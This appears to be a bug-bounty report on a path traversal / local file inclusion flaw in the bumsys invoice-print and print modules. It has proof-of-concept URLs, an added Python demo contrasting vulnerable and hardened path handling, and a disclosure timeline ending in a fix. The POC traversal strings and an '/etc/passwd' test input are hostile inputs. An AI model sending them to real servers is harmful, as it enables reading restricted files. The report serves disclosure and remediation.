LFI in module invoice-print and print in unilogies/bumsys

Valid

Reported on

Feb 23rd 2023


The page and invoiceType parameters are not properly sanitized, which leads to local file inclusion: a value containing ../ segments is used as part of the path of the file that the module includes, so it can point outside the intended template directory.

POC : http://demo.bumsys.org/invoice-print/?invoiceType=../../theme/rui/print&msg=;
POC : http://demo.bumsys.org/print/?page=../../theme/rui/invoice-print&msg=;

Impact

An attacker could include sensitive or restricted files from the server's filesystem.
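The following is an added illustration of the bug class the report describes, not code from the report or from the bumsys project. The page does not show the application's source, so the include-by-parameter logic is modelled in Python: `vulnerable_resolve` splices the parameter into the path unchanged, as the report says the real handler does, and `hardened_resolve` shows the two checks that stop the POC. The directory layout (`APP_ROOT`, `MODULE_DIRS`), the `.php` suffix and all function names are assumptions made for the demonstration.

```python
import os
import re
from typing import Optional

# Constructed layout used for the demonstration (an assumption, not bumsys's
# real directory tree): each module lives two levels below the app root, and
# the handler for /<module>/ includes <module dir>/<parameter>.php.
APP_ROOT = "/var/www/app"
MODULE_DIRS = {
    "invoice-print": os.path.join(APP_ROOT, "modules", "invoice-print"),  # ?invoiceType=
    "print": os.path.join(APP_ROOT, "modules", "print"),                  # ?page=
}

# A template name is a single path component: letters, digits, '-' and '_'.
SAFE_NAME = re.compile(r"[A-Za-z0-9_-]+")


def vulnerable_resolve(module: str, param: str) -> str:
    """The pattern the report describes: the parameter is spliced into the
    include path unchanged. '../' segments walk out of the module directory,
    and an absolute parameter replaces it entirely (os.path.join semantics)."""
    return os.path.normpath(os.path.join(MODULE_DIRS[module], param + ".php"))


def hardened_resolve(module: str, param: str) -> Optional[str]:
    """Return the include path only if the parameter is a bare template name
    AND the normalised result still sits under the module directory. Either
    check alone stops the POC; keeping both means a later relaxation of the
    name rule does not silently reopen the traversal."""
    if not SAFE_NAME.fullmatch(param):
        return None
    base = os.path.normpath(MODULE_DIRS[module])
    candidate = os.path.normpath(os.path.join(base, param + ".php"))
    if os.path.commonpath([base, candidate]) != base:
        return None
    return candidate


def escapes_module(module: str, param: str) -> bool:
    """True when the unchecked resolver would include a file outside the
    module directory, i.e. the request is a traversal."""
    base = os.path.normpath(MODULE_DIRS[module])
    resolved = vulnerable_resolve(module, param)
    return os.path.commonpath([base, resolved]) != base


if __name__ == "__main__":
    # The two POC parameters from the report, plus an absolute path and a
    # legitimate template name (constructed inputs).
    samples = [
        ("invoice-print", "../../theme/rui/print"),
        ("print", "../../theme/rui/invoice-print"),
        ("print", "/etc/passwd"),
        ("print", "receipt"),
    ]
    for module, param in samples:
        print(f"{module:14} {param!r:34} unchecked -> {vulnerable_resolve(module, param)}")
        print(f"{'':14} {'':34} hardened  -> {hardened_resolve(module, param)}")
```

Run against the POC values, the unchecked resolver lands on theme/rui/print.php and theme/rui/invoice-print.php outside the module directory, and an absolute parameter such as /etc/passwd discards the module directory altogether, which is why a prefix check on the raw string is not enough. Note that normpath only rewrites the string; if the template directory can contain symlinks, resolve the existing file with os.path.realpath before the containment comparison.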

We are processing your report and will contact the unilogies/bumsys team within 24 hours. a month ago
Khurshid Alam validated this vulnerability a month ago
mukundbhuva has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Khurshid Alam marked this as fixed in v2.0.1 with commit 256f25 a month ago
Khurshid Alam has been awarded the fix bounty
This vulnerability will not receive a CVE
Khurshid Alam published this vulnerability a month ago
Khurshid Alam
a month ago

Maintainer


Good findings. Thank you so much.
